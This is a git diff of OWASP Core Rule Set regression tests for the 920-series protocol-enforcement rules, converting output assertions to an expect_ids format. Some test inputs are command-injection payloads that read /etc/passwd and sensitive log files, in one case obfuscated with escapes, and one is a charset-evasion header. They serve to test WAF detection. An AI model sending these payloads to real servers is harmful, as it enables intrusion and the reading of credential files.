111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 output: - log_contains: id "920390" + log: + expect_ids: [920390] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml index d3ec8759c..07b08ad60 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml @@ -858,7 +858,8 @@ tests: ----------111111111-- version: "HTTP/1.1" output: - log_contains: "id \"920400\"" + log: + expect_ids: [920400] - test_id: 2 stages: - input: @@ -881,4 +882,5 @@ tests: ----------111111-- version: "HTTP/1.1" output: - no_log_contains: "id \"920400\"" + log: + no_expect_ids: [920400] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml index 588060aac..e7e82400e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml @@ -886,7 +886,8 @@ tests: ----------111111-- version: "HTTP/1.1" output: - log_contains: "id \"920410\"" + log: + expect_ids: [920410] - test_id: 2 stages: - input: @@ -909,4 +910,5 @@ tests: ----------111111-- version: "HTTP/1.1" output: - no_log_contains: "id \"920410\"" + log: + no_expect_ids: [920410] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml index ca4446f44..be0c56158 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: "Description" rule_id: 920420 tests: - test_id: 1 @@ -19,7 +18,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 2 stages: - input: @@ -35,7 +35,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 3 stages: - input: @@ -51,7 +52,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 4 stages: - input: @@ -67,7 +69,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 5 desc: Request content type is not allowed by policy (920420) from old modsec regressions stages: @@ -102,7 +105,8 @@ tests: BINARYDATA --0000-- output: - log_contains: id "920420" + log: + expect_ids: [920420] - test_id: 6 desc: Request content type is not allowed by policy (920420) from old modsec regressions stages: @@ -137,7 +141,8 @@ tests: BINARYDATA --0000-- output: - log_contains: id "920420" + log: + expect_ids: [920420] - test_id: 7 desc: Request content type is not allowed by policy (920420) from old modsec regressions stages: @@ -172,7 +177,8 @@ tests: BINARYDATA --0000-- output: - log_contains: id "920420" + log: + expect_ids: [920420] - test_id: 8 stages: - input: @@ -188,7 +194,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 9 stages: - input: @@ -204,7 +211,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 10 stages: - input: @@ -220,7 +228,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 11 stages: - input: @@ -236,7 +245,8 @@ tests: data: "test" version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 12 stages: - input: @@ -252,7 +262,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 13 stages: - input: @@ -268,7 +279,8 @@ tests: data: "test" version: "HTTP/1.1" output: - no_log_contains: "id \"920420\"" + log: + no_expect_ids: [920420] - test_id: 14 stages: - input: @@ -284,7 +296,8 @@ tests: data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' version: "HTTP/1.1" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 15 stages: - input: @@ -301,7 +314,8 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 16 stages: - input: @@ -318,7 +332,8 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] - test_id: 17 stages: - input: @@ -335,4 +350,5 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: "id \"920420\"" + log: + expect_ids: [920420] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml index f91450320..21b412ddb 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920430 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - no_log_contains: "id \"920430\"" + log: + no_expect_ids: [920430] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - no_log_contains: "id \"920430\"" + log: + no_expect_ids: [920430] - test_id: 3 stages: - input: @@ -55,7 +56,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - no_log_contains: "id \"920430\"" + log: + no_expect_ids: [920430] - # Currently FTW won't process HTTP 1.0 simple response items # This request generates such a response, so even though it will # generate the alert, it will error. @@ -116,7 +118,8 @@ tests: uri: "/" version: HTTP/4.0 output: - log_contains: id "920430" + log: + expect_ids: [920430] - test_id: 9 desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml index 49c45b14e..bc8950b96 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml @@ -21,7 +21,8 @@ tests: uri: "/get/foo.bak" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 2 desc: URL file extension is restricted by policy (920440) from old modsec regressions stages: @@ -40,7 +41,8 @@ tests: uri: "/get/foo.db" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 3 desc: URL file extension is restricted by policy (920440) from old modsec regressions stages: @@ -59,7 +61,8 @@ tests: uri: "/get/foo.old" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 4 desc: URL file extension is restricted by policy (920440) - GH issue 1296 stages: @@ -78,7 +81,8 @@ tests: uri: "/get/foo.bar.sql" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 5 desc: Redis dump file stages: @@ -97,7 +101,8 @@ tests: uri: "/get/dump.rdb" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] - test_id: 6 desc: Redis dump file, URI encoded stages: @@ -116,4 +121,5 @@ tests: uri: "/get/dump%2Erdb" version: HTTP/1.1 output: - log_contains: id "920440" + log: + expect_ids: [920440] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml index cb52a798f..abb5712cf 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, karelorigin, azurit" - description: "Description" rule_id: 920450 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] - test_id: 4 desc: HTTP header is restricted by policy (920450) from old modsec regressions, we no longer block proxy-connection in 3.0 stages: @@ -64,7 +66,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "920450" + log: + no_expect_ids: [920450] - test_id: 5 desc: HTTP header is restricted by policy (920450) from old modsec regressions stages: @@ -84,7 +87,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920450" + log: + expect_ids: [920450] - test_id: 6 stages: - input: @@ -98,7 +102,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920450\"" + log: + no_expect_ids: [920450] - test_id: 7 stages: - input: @@ -112,4 +117,5 @@ tests: Content-Encoding: deflate version: "HTTP/1.1" output: - log_contains: "id \"920450\"" + log: + expect_ids: [920450] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml index ac96c09a4..f1268ebc0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml @@ -18,7 +18,8 @@ tests: Accept-Charset: UTF-8 version: "HTTP/1.1" output: - log_contains: id "920451" + log: + expect_ids: [920451] - test_id: 2 desc: "Send a Content-Range header, which should be blocked but by this rule's sibling rule, not by this rule" stages: @@ -33,4 +34,5 @@ tests: Content-Range: bytes 4096-8192/8192 version: "HTTP/1.1" output: - no_log_contains: id "920451" + log: + no_expect_ids: [920451] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml index dcbf0897a..1317921e3 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920460 tests: - test_id: 1 @@ -18,10 +17,11 @@ tests: Content-Type: "application/x-www-form-urlencoded" User-Agent: "OWASP CRS test agent" data: 'file=cat+/etc/\passw\d' - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920460\"" + log: + expect_ids: [920460] - test_id: 2 stages: - input: @@ -34,7 +34,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920460\"" + log: + expect_ids: [920460] - test_id: 3 stages: - input: @@ -47,7 +48,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920460\"" + log: + expect_ids: [920460] - test_id: 4 stages: - input: @@ -60,7 +62,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920460\"" + log: + no_expect_ids: [920460] - test_id: 5 stages: - input: @@ -73,4 +76,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920460\"" + log: + no_expect_ids: [920460] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml index 3d6213c06..6a68b4dfa 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml @@ -18,7 +18,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] - test_id: 2 stages: - input: @@ -33,7 +34,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] - test_id: 3 stages: - input: @@ -48,7 +50,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 4 stages: - input: @@ -64,7 +67,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 5 stages: - input: @@ -79,7 +83,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 6 stages: - input: @@ -95,7 +100,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 7 stages: - input: @@ -111,7 +117,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 8 stages: - input: @@ -127,7 +134,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 9 stages: - input: @@ -143,7 +151,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 10 stages: - input: @@ -159,7 +168,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 11 stages: - input: @@ -175,7 +185,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 12 stages: - input: @@ -191,7 +202,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] - test_id: 13 stages: - input: @@ -207,7 +219,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 14 stages: - input: @@ -223,7 +236,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 15 stages: - input: @@ -239,7 +253,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 16 stages: - input: @@ -255,7 +270,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 17 stages: - input: @@ -271,7 +287,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920470\"" + log: + no_expect_ids: [920470] - test_id: 18 desc: "Status Page Test - Illegal Content-Type header: 'text/xml; blah' where blah isn't a valid parameter for this header field" stages: @@ -287,4 +304,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920470\"" + log: + expect_ids: [920470] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 04ad0542f..3d18bfad0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: "Description" rule_id: 920480 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 4 stages: - input: @@ -59,7 +61,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 5 stages: - input: @@ -73,7 +76,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 6 stages: - input: @@ -89,7 +93,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 2 stages: - input: @@ -103,7 +108,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 8 stages: - input: @@ -117,7 +123,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 9 stages: - input: @@ -133,8 +140,9 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" - - test_id: 3 + log: + no_expect_ids: [920480] + - test_id: 10 stages: - input: dest_addr: "127.0.0.1" @@ -149,8 +157,9 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" - - test_id: 4 + log: + no_expect_ids: [920480] + - test_id: 11 stages: - input: dest_addr: "127.0.0.1" @@ -164,7 +173,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "test=value" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 12 stages: - input: @@ -180,7 +190,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 5 stages: - input: @@ -196,7 +207,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] # TODO: this case is not yet handled by 3.1, future work # - test_id: 6 # stages: @@ -212,7 +224,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # epxect_ids:: [920480] - test_id: 7 stages: - input: @@ -228,7 +241,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 8 stages: - input: @@ -244,7 +258,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] # TODO: this test should pass (works with curl), to be researched # - test_id: 9 # stages: @@ -260,7 +275,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] # TODO: this test should pass (works with curl), to be researched # - test_id: 10 # stages: @@ -276,7 +292,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] - test_id: 11 stages: - input: @@ -284,16 +301,15 @@ tests: port: 80 method: "POST" headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - # random other IBM charset - Content-Type: "application/x-www-form-urlencoded;charset=ibm038" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" + User-Agent: "OWASP CRS test agent" + Host: "localhost" + # double charset may cause evasion + Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] # TODO: this case is not yet checked by CRS, future work # - test_id: 12 # stages: @@ -309,7 +325,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] # TODO: this case is not yet checked by CRS, future work # - test_id: 13 # stages: @@ -325,7 +342,8 @@ tests: # data: "test=value" # version: "HTTP/1.1" # output: - # log_contains: "id \"920480\"" + # log: + # expect_ids: [920480] - test_id: 14 stages: - input: @@ -342,7 +360,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 15 stages: - input: @@ -359,7 +378,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920480\"" + log: + no_expect_ids: [920480] - test_id: 16 stages: - input: @@ -376,7 +396,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] - test_id: 17 stages: - input: @@ -392,4 +413,5 @@ tests: data: "test=value" version: "HTTP/1.1" output: - log_contains: "id \"920480\"" + log: + expect_ids: [920480] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml index b5c1c7246..33745cc40 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml @@ -21,7 +21,8 @@ tests: data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" version: "HTTP/1.1" output: - log_contains: "id \"920490\"" + log: + expect_ids: [920490] - test_id: 2 stages: - input: @@ -38,7 +39,8 @@ tests: data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" version: "HTTP/1.1" output: - no_log_contains: "id \"920490\"" + log: + no_expect_ids: [920490] - test_id: 3 stages: - input: @@ -54,4 +56,5 @@ tests: data: "%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7" version: "HTTP/1.1" output: - no_log_contains: "id \"920490\"" + log: + no_expect_ids: [920490] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml index c665c96f7..fdc5f2753 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920500\"" + log: + expect_ids: [920500] - test_id: 2 desc: "Check request filename contains file that ends with ~ but not at end of string (bypass)" stages: @@ -33,7 +34,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920500\"" + log: + expect_ids: [920500] - test_id: 3 desc: "Rules 920500 should not block user dir such as /~user/" stages: @@ -48,4 +50,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920500\"" + log: + no_expect_ids: [920500] diff --git 